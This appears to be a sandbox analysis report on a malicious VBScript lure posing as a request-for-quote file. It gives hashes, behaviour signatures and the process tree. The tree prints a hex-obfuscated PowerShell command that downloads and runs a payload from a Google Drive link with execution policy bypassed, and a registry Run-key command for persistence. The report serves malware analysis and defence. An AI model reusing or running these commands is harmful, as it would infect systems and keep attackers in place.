Analysis
-
max time kernel
10s -
max time network
148s -
platform
windows10_x64 -
resource
win10 -
submitted
13/07/2020, 05:34
General
-
Target
RFQ_IMAGES_Hayyas (Waltham Cross).vbs
-
Size
10KB
-
MD5
b4d24a672f4a1daa990c11c03db8295e
-
SHA1
16b930060de04f72d7f9b735c5c383fbb256e2a4
-
SHA256
e81b0ab02b19ac2f9e57d1db647377d1449a4f08bb95070b49f81249b44ed43f
-
SHA512
f4c874f2d194a587b9cf08b3a0d2553e03ca98cf1409d26ccfb970532d2e5d1608d38a3abc32aad35c3d3824d24b5fca7f0407306053a3a24b6f3099a48c99c0
Score
10/10
Malware Config
Signatures
-
Blacklisted process makes network request 2 IoCs
-
Adds Run entry to start application 2 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Suspicious use of AdjustPrivilegeToken 44 IoCs
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ_IMAGES_Hayyas (Waltham Cross).vbs"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -ExecutionPolicy Bypass $eVsOKCmwhwGIfbAcCemV='24 54 62 6F 6E 65 3D 27 2A 45 58 27 2E 72 65 70 6C 61 63 65 28 27 2A 27 2C 27 49 27 29 3B 73 61 6C 20 4D 20 24 54 62 6F 6E 65 3B 64 6F 20 7B 24 70 69 6E 67 20 3D 20 74 65 73 74 2D 63 6F 6E 6E 65 63 74 69 6F 6E 20 2D 63 6F 6D 70 20 67 6F 6F 67 6C 65 2E 63 6F 6D 20 2D 63 6F 75 6E 74 20 31 20 2D 51 75 69 65 74 7D 20 75 6E 74 69 6C 20 28 24 70 69 6E 67 29 3B 24 70 32 32 20 3D 20 5B 45 6E 75 6D 5D 3A 3A 54 6F 4F 62 6A 65 63 74 28 5B 53 79 73 74 65 6D 2E 4E 65 74 2E 53 65 63 75 72 69 74 79 50 72 6F 74 6F 63 6F 6C 54 79 70 65 5D 2C 20 33 30 37 32 29 3B 5B 53 79 73 74 65 6D 2E 4E 65 74 2E 53 65 72 76 69 63 65 50 6F 69 6E 74 4D 61 6E 61 67 65 72 5D 3A 3A 53 65 63 75 72 69 74 79 50 72 6F 74 6F 63 6F 6C 20 3D 20 24 70 32 32 3B 24 6D 76 3D 27 28 4E 27 2B 27 65 77 27 2B 27 2D 4F 27 2B 27 62 27 2B 27 6A 65 27 2B 27 63 27 2B 27 74 20 27 2B 20 27 4E 65 27 2B 27 74 2E 27 2B 27 57 27 2B 27 65 62 27 2B 27 43 27 2B 27 6C 69 27 2B 27 65 6E 74 29 27 2B 27 2E 44 27 2B 27 6F 77 27 2B 27 6E 6C 27 2B 27 6F 61 27 2B 27 64 27 2B 27 53 27 2B 27 74 72 27 2B 27 69 6E 67 28 27 27 68 74 74 70 73 3A 2F 2F 64 72 69 76 65 2E 67 6F 6F 67 6C 65 2E 63 6F 6D 2F 75 2F 30 2F 75 63 3F 69 64 3D 31 38 32 55 76 69 43 45 66 6C 79 48 70 57 36 71 56 68 68 68 61 45 33 59 46 48 72 48 4E 6D 52 66 6B 26 65 78 70 6F 72 74 3D 64 6F 77 6E 6C 6F 61 64 27 27 29 27 7C 49 60 45 60 58 3B 24 61 73 63 69 69 43 68 61 72 73 3D 20 24 6D 76 20 2D 73 70 6C 69 74 20 27 2D 27 20 7C 46 6F 72 45 61 63 68 2D 4F 62 6A 65 63 74 20 7B 5B 63 68 61 72 5D 5B 62 79 74 65 5D 22 30 78 24 5F 22 7D 3B 24 61 73 63 69 69 53 74 72 69 6E 67 3D 20 24 61 73 63 69 69 43 68 61 72 73 20 2D 6A 6F 69 6E 20 27 27 7C 4D';$jm=$eVsOKCmwhwGIfbAcCemV.Split(' ') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''|I`E`X1⤵
- Blacklisted process makes network request
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell $g='C:\Users\Admin\AppData\Local\Microsoft\RFQ_IMAGES_Hayyas (Waltham Cross).vbs';'Set-Item -Path HKCU:\Software\Micro@@oft\Window@@\CurrentVer@@ion\Run -Value $g'.replace('@@','s') |I`E`X1⤵
- Adds Run entry to start application
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.execmd /c copy "C:\Users\Admin\AppData\Local\Temp\RFQ_IMAGES_Hayyas (Waltham Cross).vbs" "C:\Users\Admin\AppData\Local\Microsoft\" /Y1⤵
- Process spawned unexpected child process
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
16KB